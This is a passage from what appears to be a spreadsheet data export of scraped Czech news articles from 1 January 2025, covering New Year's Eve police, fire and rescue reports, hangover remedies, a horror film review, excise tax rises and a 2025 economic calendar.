vyšetřování, uvedl Bílý dům. Tragédie se stala jen pád dní po podobné události v německém Magdeburgu . Na vánočních trzích tam najelo auto do davu. Zemřelo pět lidí a na 230 utrpělo zranění. Pachatelem byl 50letý lékař ze Saúdské Arábie , který žil v Německu od roku 2006. Podle agentury DPA muž zřejmě trpí vážnou duševní chorobou. # New Orleans # USA #auto #terorismus # Německo #newsletter Ředitelé Evropy Přidejte si Hospodářské noviny mezi své oblíbené tituly na Google zprávách. Tento článek máte je zdarma. Když si předplatíte HN, budete moci číst všechny naše články nejen na vašem aktuálním připojení . Vaše předplatné brzy skončí. Předplaťte si HN a můžete i nadále číst všechny naše články. Nyní první 2 měsíce jen za 40 Kč. Veškerý obsah HN.cz Možnost kdykoliv zrušit Odemykejte obsah pro přátele Ukládejte si články na později Všechny články v audioverzi + playlist za 40 Kč nebo za 80 Kč Navíc mobilní aplikace a web bez reklam Autor: ČTK Autor ČTK Rubrika transition_slide Zahraniční</t>
  </si>
  <si>
    <t>6330</t>
  </si>
  <si>
    <t>20250101_127_3696323520_0c039376798d8c58bc12.html</t>
  </si>
  <si>
    <t>0c039376798d8c58bc12</t>
  </si>
  <si>
    <t>Čtyři podnapilí řidiči i napadení mezi cizinci. Silvestr pohledem policistů ve Zlínském kraji</t>
  </si>
  <si>
    <t>Čtyři podnapilí řidiči i napadení mezi cizinci. Silvestr pohledem policistů ve Zlínském kraji Foto: Policie ČR Zlínský kraj Silvestrovské oslavy ve Zlínském kraji byly z pohledu policie o něco rušnější než ty loňské. Naštěstí se však obešly bez mimořádných událostí. Na náročnou službu jsme byli tak jako každý rok připraveni, posílili jsme výkon služby. Od šesté hodiny večerní do šesté hodiny ranní jsme přijali na operačním středisku Krajského ředitelství policie Zlínského kraje bezmála 140 oznámení, která se týkala především rušení nočního klidu a přestupků proti veřejnému pořádku nebo občanskému soužití. U většiny těchto skutků sehrál roli alkohol . Lidé si také často stěžovali, že je obtěžuje hluk od odpalované zábavní pyrotechniky. Oproti loňskému roku bylo zhruba o čtyřicet volání na linku 158 více. Během Silvestra a prvních hodin Nového roku jsme nemuseli řešit žádnou závažnější dopravní nehodu. V průběhu noci jsme však narazili na čtyři podnapilé řidiče, kteří jsou podezřelí ze spáchání trestného činu ohrožení pod vlivem návykové látky. Tři z nich nadýchali nad jedno promile, jeden pak nad dvě promile. Nad ránem jsme asistovali u požáru domu v Jaroslavicích . Starší muž se tam nadýchal zplodin. Okolo páté hodiny ranní došlo ve Zlíně k fyzickému napadení mezi dvěma podnapilými cizinci, kdy jeden z mužů skončil v nemocnici. Okolnostmi tohoto incidentu se nyní zabývají zlínští policisté. mjr. Mgr. Simona Kyšnerová Policie ČR Foto: Policie ČR Pátrání po osobách Pátrání po vozidlech Nábor k Policii ČR Nábor k Celní správě ČR Nábor k Vězenské službě ČR COPYRIGHT © 2025 TÝDENÍK POLICIE. BEZ PÍSEMNÉHO SOUHLASU REDAKCE JE PŘÍSNÝ ZÁKAZ UŽÍVÁNÍ ZDE ZVEŘEJNĚNÝCH MATERIÁLŮ. PROVOZOVATELEM SERVERU JE BC. MONIKA JAŇURKOVÁ, SE SÍDLEM VĚSTONICKÁ 432/2, 15521, PRAHA - ZLIČÍN. IČ 04518900 ZAPSANÁ V ŽIVNOSTENSKÉM REJSTŘÍKU. NEJEDNÁ SE O OFICIÁLNÍ STRÁNKU POLICIE ČESKÉ REPUBLIKY . Autor: Simona Kyšnerová Autor person Simona Kyšnerová</t>
  </si>
  <si>
    <t>9900</t>
  </si>
  <si>
    <t>20250101_128_3696310736_a7edec19d6fcf19cc77a.html</t>
  </si>
  <si>
    <t>a7edec19d6fcf19cc77a</t>
  </si>
  <si>
    <t>Přelom roku v Libereckém kraji: požáry, zranění od pyrotechniky i napadení</t>
  </si>
  <si>
    <t>Přelom roku v Libereckém kraji: požáry, zranění od pyrotechniky i napadení „Od včerejší osmnácté hodiny do dnešní ranní šesté hodiny zasahovali hasiči celkem u jedenadvaceti událostí. Jednalo se o dvanáct požárů, nejčastěji odpadní kontejnery a obaly po zábavní pyrotechnice. Sedm technických pomocí, jednu dopravní nehodu a jeden planý poplach,” zhodnotili silvestrovskou noc hasiči z Liberecka . Záchranáři měli v Libereckém kraji 260 výjezdů. Podle nich bylo letošní množství napadení a agrese výjimečné. Sedm lidí se zranilo při odpalování pyrotechniky, další desítky lidí bylo ošetřeno v souvislosti s nadměrným požíváním alkoholu nebo se po požití alkoholu zranili. Řešili také desítky napadení. Požárů řešili hasiči celkem dvanáct. "V pěti případech to byl požár kontejneru, pět požárů vzniklo v souvislosti s použitím zábavní pyrotechniky, hořící obaly zanechané na ulici či u kontejnerů, a dvakrát se jednalo o požár dřevěného odpadu," upřesnila mluvčí hasičů Jaroslava Benešová. Během silvestrovské noci probíhalo také pátrání po 57leté ženě z Harrachova , nasazen byl vrtulník s termovizí, který ji pomohl najít. „Nacházela se poblíž Mumlavských vodopádů, byla podchlazená a vyčerpaná. Do péče si ji převzali zdravotníci,” uvedla policejní mluvčí Ivana Baláková. Zprávy „Od 18. hodiny 31. prosince do dnešní půl šesté ráno jsme na tísňové lince 158 přijali 113 hovorů. Většina z nich se týkala narušení občanského soužití v podobě verbálního, ale i fyzického napadání, jak na veřejnosti mezi cizími osobami, tak i v soukromí mezi známými nebo rodinnými příslušníky,” pokračovala policejní mluvčí. V Novém Městě pod Smrkem skupinka opilců napadla tři mladíky. „Tři řidiče jsme přistihli za volantem pod vlivem alkoholu s výsledky dechových zkoušek od 1,1 do 1,5 promile. Kolem včerejší 20. hodiny se nám podařilo vypátrat člověka se sebevražednými úmysly ještě dříve, než si stačil ublížit. Předali jsme ho do péče lékařů,” dodala Ivana Baláková. Liberecko Prvenství v hasičských statistikách, co se týče zásahu v novém roce, získali profesionální hasiči z centrální hasičské stanice v Liberci . Čtyři minuty po půlnoci vyjeli do libereckých Rochlic k záchraně osoby. "Kolegům ze Zdravotnické záchranné služby Libereckého kraje pomohli s transportem osoby do sanitního vozu," uvedla mluvčí. Ani na výjezd k prvnímu požáru nového roku nečekali hasiči dlouho. Minutu před čtvrt na jednu ráno byl vyhlášen poplach profesionálním a dobrovolným hasičům na Českolipsku. Zaměstnal je požár dřevěného odpadu u rodinného domu ve Stráži pod Ralskem . "K lokalizaci a likvidaci požáru zasahující nasadili jeden vysokotlaký proud, během pár minut měli plameny pod kontrolou. Zcela zlikvidován byl požár během zhruba čtvrt hodiny. Při události nebyl nikdo zraněn," dodala Jaroslava Benešová. Mohlo by vás zajímat: Hádanka z Libereckého kraje: Poznáte, co je na fotkách a videu? Hádanka z hor. | Video: Adéla Beranová Autor: Hynek Dlouhý Autor Hynek Dlouhý</t>
  </si>
  <si>
    <t>10960</t>
  </si>
  <si>
    <t>12630</t>
  </si>
  <si>
    <t>20250101_129_3696276521_950c2be4f399201615b0.html</t>
  </si>
  <si>
    <t>950c2be4f399201615b0</t>
  </si>
  <si>
    <t>Co s&amp;nbsp;kocovinou? Na bolavou hlavu a&amp;nbsp;žaludek na vodě pomohou i&amp;nbsp;babské rady</t>
  </si>
  <si>
    <t>Co s&amp;nbsp;kocovinou? Na bolavou hlavu a&amp;nbsp;žaludek na vodě pomohou i&amp;nbsp;babské rady Co s kocovinou? Na bolavou hlavu a žaludek na vodě pomohou i babské rady Novoroční rána bývají nemilosrdná. Ať už jste vstoupili do nového roku s hlavou jako střep nebo žaludkem na vodě, můžete buď trpět a čekat, až to přejde, nebo vyzkoušet osvědčené vyprošťovací tipy. Silvestr, narozeniny, nebo jen páteční večer – oslavy mohou být skvělé, ale ráno po nich už tak příjemné nebývá. Kocovina, ta nechtěná společnice večírků, dokáže potrápit i ty nejodolnější z nás. Co ale dělat, když se ráno probudíte s třeštící hlavou, suchem v ústech a žaludkem na vodě? Tady je několik tipů, jak si ulevit a co funguje jako zaručené vyprošťováky. Proč je vám tak zle? Alkohol dehydruje tělo, protože z něj odvádí tekutiny. Navíc zatěžuje játra a žaludek, který se musí vypořádat s toxickými zplodinami vznikajícími při jeho odbourávání. K tomu přidejte nedostatek spánku a kalorické bomby jako chipsy a chlebíčky, které jste do sebe během noci naházeli – a kombinace na pořádnou kocovinu je na světě. Hydratace na prvním místě Po probuzení je klíčové doplnit tekutiny. Voda s citronem : Pomáhá neutralizovat kyselost žaludku a doplňuje vitamín C. Kokosová voda : Obsahuje draslík, který tělo potřebuje k rehydrataci. Bylinkové čaje : Zázvorový čaj zklidní žaludek, mátový pomůže, když se nemůžete na nic jiného ani podívat. Doplňte vitaminy a minerály Kocovina často způsobuje nedostatek vitaminů B a C. Sáhněte po multivitaminu nebo si dejte čerstvý džus, třeba pomerančový nebo grepový, které jsou bohaté na vitamin C. Ovšem ještě mnohem lepší než džus je sníst samotné ovoce - osvěží stejně, a navíc obsahuje vlákninu, která je prospěšná při příjmu většího množství fruktózy. Pokud máte doma banány, snězte jeden – obsahují draslík, který tělo po alkoholu nutně potřebuje. Co s bolestí hlavy? Pokud vás bolí hlava, může pomoci tabletka, ale pozor na složení: Vyhněte se paracetamolu , který může zatížit játra. Lepší volbou jsou léky s ibuprofenem nebo kyselinou acetylsalicylovou. Přírodní cestou lze zkusit studený obklad na čelo a spánek. Co jíst, když je žaludek na vodě? Česnečka : Klasický český vyprošťovák obsahuje minerály a sůl, které tělo potřebuje. Vývar : Slepičí nebo hovězí vývar posílí žaludek a doplní energii. Banány : Lehká svačina plná vitamínu B6, draslíku a hořčíku. Vajíčka : Obsahují cystein, který pomáhá odbourávat toxiny. Jogurt nebo smoothie : Pokud na pevné jídlo nemáte chuť, zkuste mix ze špenátu, jablka a zázvoru. Funguje alkohol jako vyprošťovák? Říká se, že pivo nebo panák pomohou. Ve skutečnosti však tělu jen přidáváte další alkohol , což proces regenerace spíš zpomalí. Pokud vám další dávka alkoholu „pomáhá“, může to být signál, že máte problém. Zkuste místo toho raději čistou vodu nebo výše zmíněné čaje. Káva: Pomocník, nebo nepřítel? Káva vás může na chvíli probrat, ale zároveň dehydratuje a může podráždit žaludek. Sáhněte raději po nízkokyselé kávě typu robusta a nezapomeňte ji kombinovat s dostatkem vody. Tipy na rychlou regeneraci Ledová sprcha: Probere tělo i mysl. Začněte teplou vodou a postupně snižujte teplotu. Pohyb na čerstvém vzduchu: Lehká procházka rozhýbe metabolismus. Odpočinek: I když je lákavé zůstat celý den v posteli, střídání pohybu a relaxace je nejlepší cestou k zotavení. Zhluboka dýchat: Kyslík je váš nejlepší přítel vždy a za všech okolností. V probíhající kocovině ho ale potřebujete ještě několinásobně víc, než za běžných okolností. Proto dýchejte z plných plic. Babské rady, které fungují Okurkový lák – rychle doplní ztracené minerály a trochu osvěží. Zázvorový čaj – zklidní žaludek a pomůže proti nevolnosti. Jedlá soda – smíchejte lžičku s vodou, pomůže s překyselením žaludku. Prevence je základ Pokud vás kocovina dostihla, už s tím nic nenaděláte. Ale příště zkuste pít s mírou, nemíchat různé druhy alkoholu , a hlavně nezapomínejte prokládat alkohol vodou. Vaše tělo vám za to poděkuje – a ráno možná ani nepoznáte, že jste slavili. Proč zapomenout na novoroční předsevzetí se dočtete v tomto článku.</t>
  </si>
  <si>
    <t>20250101_13_3698222003_b40ef996a40418078982.html</t>
  </si>
  <si>
    <t>b40ef996a40418078982</t>
  </si>
  <si>
    <t>New Year’s Evil (1980)</t>
  </si>
  <si>
    <t>New Year ’s Evil (1980) Solo — 1. ledna 2025 0 comment rp New20Year39s20Evil201980.jpg Loading... New Year's Evil (1980) Konec roku se blíží a tak během silvestrovského odpočítávání hodlá šílený psychopat, zabít jednu oběť v každém z časových pásem … Během silvestrovské punk rockové show, se rozhodne televize společně s rádiem uspořádat nezapomenutelnou párty v jednom z Hollywoodských hotelů. Uvádět jí přímo na obrazovkách i éteru bude v živém přenosu všemi oblíbená moderátorka Diane Sullivan, svými fanoušky známá pod přezdívkou Blaze. Zatímco její syn musí na ní znechuceně čekat v hotelovém pokoji, ona si celou akci užívá před kamerami. Ovšem jen do doby, kdy do vysílání zavolá muž, který se představí jako „EVIL“ a oznámí, že úderem půlnoci v každém časovém pásmu zabije s příchodem Nového roku jednu oběť a poslední bude ona sama. Zatímco show pokračuje, lidé se baví a policie zabezpečí celý hotel, vrah se činí, počet obětí narůstá a ON se chystá k finálnímu zúčtování… Český název: Novoroční zlo Chris Wallace ...(poručík Clayton) ...a další Hodně dlouho jsem si schovával tento film ve své pomyslném „šuplíku“ a nachystal si jej právě pro tento den. Máme tu Nový rok a tak proč jej nezačít právě kouskem se silvestrovskou / novoroční tématikou. Slasher coby hororový subžánr mám hodně rád, takže jsem se s chutí hodlal ponořit do naservírovaného příběhu. Chlebíčky a alkohol vystřídal lidský nářek a utrpení, bohužel však ve formě, která nebyla zrovna nejkvalitnější, co jsem kdy viděl. Vrah tu sice docela úřaduje a počet obětí byl uspokojující, ovšem většina mordů se bohužel odehrála mimo záběr kamery. Nějaké to máchání zakrváceným nožem, igelitový pytlík v akci a smrtelný křik, nedokáže uspokojit mé někdy až zvrácené choutky. Naštěstí se to tvůrci snažili okořenit i o několik nečekaných překážek, které vraha na jeho cestě zpomalovaly či překvapily a on musel improvizovat (viz motorkáři či autokino). Kupodivu mi ani nevadilo, že vrahovi vidíme hned od začátku do tváře a stejně si myslím, že tu první oběť neměl na svědomí ani on, páč by to jinak nestíhal v ostatních časových pásmech, ostatně úplný konec tomu tak nějak i nasvědčuje… Asi největší smůlou bylo, že mi tady kromě některých obětí nebyla moc sympatická žádná další postava (hlavní hrdinka, její syn, vrah, detektiv…). Což se projevilo hlavně díky ne zrovna působivým hereckým výkonům. Alespoň jsem si ale mohl udělat další pomyslný zářez a odškrtnout si další film v mé bohaté sbírce. V neposlední řadě bych chtěl alespoň pochválit vytvořenou atmosféru, která se místy docela vydařila. Možná v mých žilách ještě pořád koleje nějaký ten „zbytkáč“, ale když přivřu jedno oko, jsem ochotný tomu dát alespoň průměrné ohodnocení… Hodnocení: Autor: Solo Autor person Solo Rubrika transition_slide Horory</t>
  </si>
  <si>
    <t>1310</t>
  </si>
  <si>
    <t>20250101_130_3696242619_4b20ec358fef0cd28baf.html</t>
  </si>
  <si>
    <t>4b20ec358fef0cd28baf</t>
  </si>
  <si>
    <t>Od ledna 2025 čekají kuřáky a pijáky alkoholu velké změny, které zasáhnou jejich peněženky. Opět roste spotřební daň | | Strana 3</t>
  </si>
  <si>
    <t>Od ledna 2025 čekají kuřáky a pijáky alkoholu velké změny, které zasáhnou jejich peněženky. Opět roste spotřební daň | | Strana 3 Nerovnoměrné daňové zatížení Výrobci lihovin také kritizují nerovnoměrné rozložení daňového zatížení mezi jednotlivé druhy alkoholických nápojů. Zatímco lihoviny tvoří pouze 30 % celkové spotřeby alkoholu v Česku, na výběru spotřební daně se podílejí 65 %. Naproti tomu víno , které představuje čtvrtinu konzumace alkoholu , přispívá do státního rozpočtu jen minimálně, a to především díky šumivým vínům. Tichá vína jsou totiž od spotřební daně osvobozena, což výrobci lihovin považují za nespravedlivé a za selhání současné politické reprezentace. Závěr Zdražení tabáku a alkoholu od ledna 2025 přinese nejen vyšší náklady pro spotřebitele, ale také změny na trhu. Výrobci se budou muset přizpůsobit novým podmínkám, což může vést k dalším inovacím v nabídce produktů. Zároveň se otevírá otázka, zda zvýšení daní skutečně přinese očekávané příjmy do státního rozpočtu a zda bude mít pozitivní dopad na zdraví obyvatel.Chat textarea Autor: A S Rubrika transition_slide Zajímavosti</t>
  </si>
  <si>
    <t>22990</t>
  </si>
  <si>
    <t>20250101_131_3696263267_a68e07d6e40fdef211b0.html</t>
  </si>
  <si>
    <t>a68e07d6e40fdef211b0</t>
  </si>
  <si>
    <t>Silvestr v Libereckém kraji. V Hrádku nad Nisou explodovala mladíkovi v ruce zábavní pyrotechnika</t>
  </si>
  <si>
    <t>Silvestr v Libereckém kraji . V Hrádku nad Nisou explodovala mladíkovi v ruce zábavní pyrotechnika Foto: Policie ČR Liberecký kraj Od 18. hodiny 31. prosince do novoroční půl šesté ráno přijali policisté na tísňové lince 158 celkem 113 hovorů. Většina z nich se týkala narušení občanského soužití v podobě verbálního, ale i fyzického napadání, jak na veřejnosti mezi cizími osobami, tak i v soukromí mezi známými nebo rodinnými příslušníky. Policisté tyto případy převážně kvalifikovali jako přestupky, jeden dosáhl intenzity přečinu výtržnictví. Došlo k němu v Novém Městě pod Smrkem , kde skupinka opilců napadla tři mladíky. Incident stále prověřujeme. Tři řidiče jsme přistihli za volantem pod vlivem alkoholu s výsledky dechových zkoušek od 1,1 do 1,5 promile. Osmnáctiletého mladíka musela ošetřovat zdravotnická záchranná služba v Hrádku na Nisou po zranění ruky v souvislosti s jeho neopatrnou manipulací se zábavní pyrotechnikou. Kolem včerejší 20. hodiny se nám podařilo vypátrat člověka se sebevražednými úmysly ještě dříve, než si stačil ublížit. Předali jsme ho do péče lékařů. por. Bc. Ivana Baláková Policie ČR Foto: Policie ČR Pátrání po osobách Pátrání po vozidlech Nábor k Policii ČR Nábor k Celní správě ČR Nábor k Vězenské službě ČR COPYRIGHT © 2025 TÝDENÍK POLICIE. BEZ PÍSEMNÉHO SOUHLASU REDAKCE JE PŘÍSNÝ ZÁKAZ UŽÍVÁNÍ ZDE ZVEŘEJNĚNÝCH MATERIÁLŮ. PROVOZOVATELEM SERVERU JE BC. MONIKA JAŇURKOVÁ, SE SÍDLEM VĚSTONICKÁ 432/2, 15521, PRAHA - ZLIČÍN. IČ 04518900 ZAPSANÁ V ŽIVNOSTENSKÉM REJSTŘÍKU. NEJEDNÁ SE O OFICIÁLNÍ STRÁNKU POLICIE ČESKÉ REPUBLIKY . Autor: Ivana Baláková Autor person Ivana Baláková</t>
  </si>
  <si>
    <t>20250101_132_3696267491_5a9b686cce6d5a7f95e5.html</t>
  </si>
  <si>
    <t>5a9b686cce6d5a7f95e5</t>
  </si>
  <si>
    <t>Davy lidí vítaly Nový rok na pláži v Riu i na náměstí v New Yorku</t>
  </si>
  <si>
    <t>Davy lidí vítaly Nový rok na pláži v Riu i na náměstí v New Yorku Po Evropě vítala nový rok ohňostroji a hudbou také Jižní a Severní Amerika . Statisíce lidí dorazily na slavnou pláž Copacabana v Riu de Janeiro , na plážích slavili Silvestra také v mexickém Acapulku či v Peru . Desítky tisíc lidí navzdory deštivému počasí vítali nový rok podle agentury AFP na newyorském náměstí Times Square. Mezi posledními slavili příchod nového roku na západním pobřeží Spojených států , ve starém roce ještě do 11:00 SEČ zůstávají na Havaji . Reklama Na pláži Copacabana podle serveru G1 trval ohňostroj 12 minut a zněly k němu písně Lady Gaga, Madonny či skupiny Coldplay . Organizátoři očekávali až 2,5 milionu lidí a místní média neuvádějí, kolik jich nakonec přišlo. Pláž, nábřeží i přilehlé ulice ale byly podle fotografií z místa zcela zaplněné. Kvůli bezpečnosti zablokovala policie příjezdové silnici ke Copacabaně a na pořádek dohlížely tisíce policistů. Zakázán byl kvůli bezpečnosti pouliční prodej nápojů ve skleněných lahvích. Ohňostroji a koncerty vítali lidé nový rok i na dalších místech Ria de Janeiro. Revelers embraced and the air filled with confetti as midnight struck at the annual Times Square ball drop in New York City. https://t.co/qO85epPMsI pic.twitter.com/J2zzvjbfom — ABC News (@ABC) January 1, 2025 Na pláže vyrazili o silvestrovské noci i v Peru , jehož pobřeží koncem minulého týdne postihlo nebývale silné vlnobití. Varování před vlnami, ale už ne tak silnými, tam platilo i v pondělí a v úterý. Ohňostroji a koncerty rovněž na pláži a na nábřeží slavili lidé příchod roku 2025 také v mexickém letovisku Acapulco . Reklama Davy čekaly nový rok na newyorském náměstí Times Square, kde podle AFP desítky tisíc lidí přihlížely tradičnímu spouštění více než pětitunové křišťálové koule z obřího stožáru. Oslavy v New Yorku provázel hustý déšť a také zvýšená přítomnost policie. Plán bezpečnostních opatření bral podle úřadů v potaz i útok na vánoční trh v Německu . Některé křižovatky v centru Manhattanu zablokovaly popelářské vozy, aby zabránily autům vjet do pěších zón. Nad oslavujícím davem také kvůli bezpečnosti přelétaly drony. V Grónsku někteří lidé pro jistotu slavili příchod Nového roku hned dvakrát během jediné noci: nejprve ve chvíli, kdy se půlnoc přehoupla do nového dne v Dánsku , a pak znovu o půlnoci místního času, uvedla BBC. Grónsko je integrální součástí Dánského království se samosprávou ve vnitřních záležitostech. Mezi posledními slavili příchod nového roku na západním pobřeží Spojených států . V Las Vegas desítky tisíc lidí sledovaly ohňostroj, který se spustil ze střech tamních kasin. Některé zastihl příchod nového roku na palubě letadla, například téměř dvě stovky pasažérů letu z Madridu do Kostariky , napsal deník El País . Posádka s barevnými kloboučky začala čtvrthodiny před půlnocí budit spící cestující a rozdávat hroznové víno , aby mohli dodržet španělskou tradici rozšířenou i v zemích Latinské Ameriky a o půlnoci s každým úderem zvonu sníst jednu z 12 kuliček vína . Autor: ČTK Autor ČTK Rubrika transition_slide Zprávy</t>
  </si>
  <si>
    <t>20250101_133_3696242348_5df05c62e84017b353fc.html</t>
  </si>
  <si>
    <t>5df05c62e84017b353fc</t>
  </si>
  <si>
    <t>Od ledna 2025 čekají kuřáky a pijáky alkoholu velké změny, které zasáhnou jejich peněženky. Opět roste spotřební daň | | Strana 2</t>
  </si>
  <si>
    <t>Od ledna 2025 čekají kuřáky a pijáky alkoholu velké změny, které zasáhnou jejich peněženky. Opět roste spotřební daň | | Strana 2 Ministerstvo financí tento krok zdůvodňuje snahou přiblížit zdanění zahřívaného tabáku klasickým cigaretám, což odpovídá doporučením odborníků a praxi v okolních zemích. Alkoholické nápoje podraží Zvýšení spotřební daně se dotkne také lihovin. V roce 2025 se jejich daň zvýší o 10 %, přičemž v roce 2026 dojde k dalšímu nárůstu o 5 %. Výjimku však tvoří pěstitelské pálení pro vlastní potřebu, které bude i nadále zatíženo pouze poloviční sazbou daně. Pro srovnání, v roce 2024 činila tato daň u pěstitelských pálenic 178 korun za litr čistého alkoholu . Reakce výrobců a dopady na trh Výrobci lihovin se proti zvýšení daní ohrazují. Podle nich vyšší daňové zatížení nevede k očekávanému růstu příjmů státního rozpočtu. Naopak, výnosy ze spotřební daně z lihovin v roce 2024 klesly o 100 milionů korun ve srovnání s předchozím rokem. Ministerstvo financí však očekává, že prosinec přinese nárůst výběru díky předzásobení před lednovým zdražením. Výrobci se snaží na vyšší daňovou zátěž reagovat různými způsoby. Někteří zvyšují ceny svých produktů, jiní snižují obsah alkoholu v tradičních nápojích. Tyto změny ovlivňují i chování zákazníků, kteří stále častěji sahají po prémiových a inovativních lihovinách na úkor tradičních produktů, jako je například tuzemák. Autor: A S Rubrika transition_slide Zajímavosti</t>
  </si>
  <si>
    <t>20250101_134_3696241062_a8f07bdbae889873e76a.html</t>
  </si>
  <si>
    <t>a8f07bdbae889873e76a</t>
  </si>
  <si>
    <t>Od ledna 2025 čekají kuřáky a pijáky alkoholu velké změny, které zasáhnou jejich peněženky. Opět roste spotřební daň</t>
  </si>
  <si>
    <t>Od ledna 2025 čekají kuřáky a pijáky alkoholu velké změny, které zasáhnou jejich peněženky. Opět roste spotřební daň Od ledna 2025 čekají kuřáky a konzumenty alkoholických nápojů výrazné změny, které zasáhnou jejich peněženky. Vláda totiž v rámci svého konsolidačního balíčku zvyšuje spotřební daň na tabákové výrobky i alkohol . Tento krok má za cíl nejen zvýšit příjmy státního rozpočtu, ale také podpořit zdravější životní styl a bojovat proti závislostem. Zdražení tabákových výrobků Spotřební daň na cigarety, doutníky, tabák a další podobné výrobky vzroste od ledna o 5 %. Tento trend bude pokračovat i v následujících letech, konkrétně v roce 2026 a 2027, kdy se sazby opět zvýší o stejnou hodnotu. Ještě výraznější nárůst čeká zahřívaný tabák, jehož spotřební daň se bude zvyšovat o 15 % ročně po dobu tří let. Autor: A S Rubrika transition_slide Zajímavosti</t>
  </si>
  <si>
    <t>20250101_135_3696261953_48a7f9dae827de04cd24.html</t>
  </si>
  <si>
    <t>48a7f9dae827de04cd24</t>
  </si>
  <si>
    <t>Silvestr poznamenaly úrazy od pyrotechniky, hasiči hlásí nejvíc požárů za 7 let</t>
  </si>
  <si>
    <t>Silvestr poznamenaly úrazy od pyrotechniky, hasiči hlásí nejvíc požárů za 7 let Oslavy příchodu nového roku byly v Česku pro zdravotnické záchranáře v některých krajích náročnější než před rokem, často ošetřovali lidi s úrazy od zábavní pyrotechniky, někdy i velmi závažnými. Někde přibylo také lidí, které zmohl alkohol . Policie uvedla, že během silvestrovské noci vyjížděla k mnohem více konfliktním situacím než v běžný den a řešila i domácí násilí. Pátrala po seniorovi, který se při oslavách ztratil na Táborsku. Hasiči celorepublikově evidují 357 požárů, což je nejvíc za minimálně sedm let. Hořelo několik rodinných domů a zasahovali také u požárů hal. V Praze záchranáři během noci vyjeli k 348 případům, s oslavami příchodu nového roku souvisela stovka a zranění zábavní pyrotechnikou bylo devět, řekl dnes ČTK mluvčí zdravotnické záchranné služby Karel Kirs. Před rokem zasahovali během noční směny u 229 událostí a úrazů pyrotechnikou bylo sedm. Z centra Prahy minulou noc odvezli do nemocnic 13 lidí. „Nejzávažnější případ představoval úraz hlavy, který si vyžádal napojení pacienta na umělou plicní ventilaci a následný transport do traumacentra,“ uvedl Kirs na sociální síti X . Úrazy od zábavní pyrotechniky byly častější než loni také ve středních Čechách . Záchranáři zasahovali u šesti zraněných a čtyř popálených. V Libereckém kraji na silvestra až do dnešního rána měli víc než 260 výjezdů, což je zhruba o stovku víc než běžně. Protialkoholní záchytná stanice v Pardubicích byla na silvestra plná již v 20:00, informovala pardubická městská policie. Zranění po požití alkoholu nebo od pyrotechniky zaměstnala záchranáře také v Ústeckém kraji , několik lidí přišlo o část ruky. Mladíkovi z Mostecka pyrotechnika utrhla prsty a část dlaně, řekla ČTK policejní mluvčí Ilona Gazdošová. V Moravskoslezském kraji bylo zásahů víc než dvojnásobek oproti běžným nocím, při odpalování pyrotechniky se zranilo osm lidí. Naopak za relativně klidnou označili silvestrovskou noc záchranáři z Plzeňského nebo Karlovarského kraje . Policie uvedla, že během silvestra a noci na Nový rok nezaznamenala žádnou mimořádnou událost. „Ale i přesto jsme řešili mnohem více konfliktních případů než v běžný den. Především se jednalo o rušení nočního klidu, různé formy napadání a bohužel i domácí násilí,“ napsala na síti X . Celorepublikově policisté řešili 3250 případů. „Což je přibližně stejně jako v běžný pracovní den,“ doplnila. Na Táborsku se ztratil devětašedesátiletý muž, který po 22:00 odešel z večírku v obci Dírná. Policie ho hledala i s použitím vrtulníku, našla ho v jiné obci. V centru Prahy policisté pokutovali za zakázané odpalování pyrotechniky téměř 50 lidí, hlavně cizinců. Vyjížděli také k potyčce na ubytovně, při které jeden člověk utrpěl řezné poranění. Zadrželi muže, který v Praze 10 poškodil bezpečnostním kladívkem okna u deseti zaparkovaných vozidel, a také opilého muže, který na Smetanově nábřeží hodil po policejním voze skleněnou láhev. Opilí lidé a jejich úrazy zaměstnávali policisty a záchranáře také v dalších krajích. S pyrotechnikou podle předběžných informací souviselo mezi 20:00 na silvestra a 06:00 na Nový rok 190 výjezdů hasičů, před rokem to bylo 158. Nejčastěji hořely odpadkové koše, kontejnery nebo zbytky odpálené pyrotechniky. Od ní často vzplanuly keře, tráva nebo živé ploty. Na 357 se celorepublikový počet požárů zvýšil z 260 o předchozí silvestrovské noci. Nejrušnější noc měli hasiči v Moravskoslezském a Středočeském kraji , tam z 51 požárů jen čtyři nebyly od pyrotechniky. Na jižní Moravě hořely dva rodinné domy na Vyškovsku a jeden na Hodonínsku, při požáru ve Studnicích na Vyškovsku převzali dva lidi do péče záchranáři. Oheň zachvátil bývalou pilu v Rybništi na Děčínsku a rodinný dům v Černěvsi na Litoměřicku. Tam vznikl zřejmě od přímotopu a předběžně způsobil škodu přesahující sedm milionů korun. V bytě v panelovém domě hořelo ve Svitavách , jednoho člověka odsud záchranáři odvezli s lehčím zraněním do místní nemocnice. Ve skladovací hale v Horním Benešově na Bruntálsku hasiči v noci dohašovali požár zhruba 20 tun granulátu směsi oxidu hlinitého, škoda je osm milionů korun. Zásah u požáru průmyslové haly ve Frýdlantu nad Ostravicí na Frýdecko-Místecku hasičům podle mluvčí Lucie Pipiš komplikoval silný vítr. Autor: ČTK Autor ČTK Rubrika transition_slide ČR</t>
  </si>
  <si>
    <t>20250101_136_3696231084_978db6a9b91379bb195a.html</t>
  </si>
  <si>
    <t>978db6a9b91379bb195a</t>
  </si>
  <si>
    <t>Důležité ekonomické události v ČR a ve světě v roce 2025</t>
  </si>
  <si>
    <t>Důležité ekonomické události v ČR a ve světě v roce 2025 01.01.2025 14:23 Autor: Tým FXstreet.cz Sekce: Tradingové analýzy a zprávy Tisk Výběr hlavních dosud známých ekonomických očekávaných událostí v ČR a ve světě v roce 2025: LEDEN 1. - Od ledna se zvýší mýtné pro nákladní auta na 3,5 tuny. Zvýší se ceny dálničních známek, cena té celoroční vzroste o 140 korun na 2440 korun. - Začne platit povinný sběr textilu pro jeho opakované využití, nebo recyklaci. - Minimální mzda vzroste o 1900 korun na 20.800 korun měsíčně. - Starobní důchody se od ledna zvýší v průměru o 358 korun měsíčně. - Železniční trať Česká Třebová - Olomouc - Přerov přejde do výhradního provozu se zabezpečovacím systémem ETCS. Následují tratě Břeclav - Bohumín (8. ledna), Česká Třebová - Břeclav (15. ledna) a Praha - Běchovice - Česká Třebová (22. ledna). - Účinnosti nabývá novela zákona o veřejném zdravotním pojištění, která mění sledování ochranných limitů pro doplatky částečně hrazených léků. 2. - Společnost S&amp;amp;P Global zveřejní index nákupních manažerů ČR za prosinec. 3. - Český statistický úřad ( ČSÚ ) zveřejní čtvrtletní sektorové účty za 3. čtvrtletí 2024, tedy vývoj HDP včetně struktury, a deficit a dluh vládních institucí za 3. čtvrtletí 2024. - Ministerstvo financí zveřejní údaje o státním rozpočtu ke konci ledna. - Záznam z měnověpolitického jednání bankovní rady České národní banky z 19. prosince. 